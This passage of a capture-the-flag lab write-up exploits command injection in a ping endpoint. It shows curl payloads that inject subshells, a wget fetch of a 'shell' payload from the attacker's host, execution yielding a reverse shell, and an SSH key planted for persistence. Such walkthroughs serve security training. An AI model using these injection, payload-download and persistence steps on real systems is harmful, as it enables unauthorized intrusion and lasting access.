OS Command Injection


The target API server provides an endpoint that uses the ping command, and it appears to pass the user input (ip) directly to the OS command as an argument. If there is no input validation in place, it is entirely possible to inject an arbitrary command.

┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ curl -i 'http://10.10.57.71:8081/ping?ip=`$(id)`#' 
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Content-Length: 61
ETag: W/"3d-2J2mX1i3I4uQhsVi8ABaq24IgPw"
Date: Mon, 22 Jul 2024 16:21:34 GMT
Connection: keep-alive
 
ping: groups=1002(www): Temporary failure in name resolution
 
┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ curl -i 'http://10.10.57.71:8081/ping?ip="`$(id)`"#'
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Content-Length: 89
ETag: W/"59-6qy5Gtjr20eTzFb0MYoj/K21zN0"
Date: Mon, 22 Jul 2024 16:21:42 GMT
Connection: keep-alive
 
ping: uid=1002(www) gid=1002(www) groups=1002(www): Temporary failure in name resolution

Confirmed!

┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ curl -i 'http://10.10.57.71:8081/ping?ip="`$(wget+http://10.9.1.180/shell)`"#'
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Content-Length: 375
ETag: W/"177-gmMGpHmD+MVXEqQodI4b/J4sl+4"
Date: Mon, 22 Jul 2024 16:32:52 GMT
Connection: keep-alive
 
--2024-07-22 16:32:52--  http://10.9.1.180/shell
Connecting to 10.9.1.180:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 194 [application/octet-stream]
Saving to: ‘shell’
 
     0K                                                       100% 1.73M=0s
 
2024-07-22 16:32:52 (1.73 MB/s) - ‘shell’ saved [194/194]
 
ping: : Name or service not known

Since there are a lot of wrappers and subshells involved, it would be a hassle to send a properly encoded command. So I will opt for sending a payload instead.

┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ curl -i 'http://10.10.57.71:8081/ping?ip="`$(chmod+755+shell)`"#'             
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Content-Length: 34
ETag: W/"22-xMrbEG377Cg2Ba0HleV3ce6BGpk"
Date: Mon, 22 Jul 2024 16:33:08 GMT
Connection: keep-alive
 
ping: : Name or service not known

Making it executable

┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ curl -i 'http://10.10.57.71:8081/ping?ip="`$(./shell)`"#'
curl: (52) Empty reply from server

Triggering the payload

┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.9.1.180] from (UNKNOWN) [10.10.57.71] 53804
whoami
www
hostname
ultratech-prod
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
    link/ether 02:1c:21:b7:f9:bf brd ff:ff:ff:ff:ff:ff
    inet 10.10.57.71/16 brd 10.10.255.255 scope global dynamic eth0
       valid_lft 2168sec preferred_lft 2168sec
    inet6 fe80::1c:21ff:feb7:f9bf/64 scope link 
       valid_lft forever preferred_lft forever

Initial foothold established on the target system as the www account via OS command injection.

It's not the service account, www-data.

www@ultratech-prod:/home/www$ mkdir .ssh ; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' >> ./.ssh/authorized_keys

Writing the public SSH key

┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ ssh www@$IP -i ~/.ssh/id_ed25519 
The authenticity of host '10.10.57.71 (10.10.57.71)' can't be established.
ED25519 key fingerprint is SHA256:g5I2Aq/2um35QmYfRxNGnjl3zf9FNXKPpEHxMLlWXMU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.57.71' (ED25519) to the list of known hosts.
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-46-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of Mon Jul 22 17:07:41 UTC 2024
 
  System load:  0.09               Processes:           105
  Usage of /:   24.3% of 19.56GB   Users logged in:     0
  Memory usage: 80%                IP address for eth0: 10.10.57.71
  Swap usage:   0%
 
 
1 package can be updated.
0 updates are security updates.
 
 
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
$ whoami
www
$ hostname    
ultratech-prod
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 9001
        inet 10.10.57.71  netmask 255.255.0.0  broadcast 10.10.255.255
        inet6 fe80::1c:21ff:feb7:f9bf  prefixlen 64  scopeid 0x20<link>
        ether 02:1c:21:b7:f9:bf  txqueuelen 1000  (Ethernet)
        RX packets 5143  bytes 4274297 (4.2 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4286  bytes 740774 (740.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 640  bytes 54904 (54.9 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 640  bytes 54904 (54.9 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Via SSH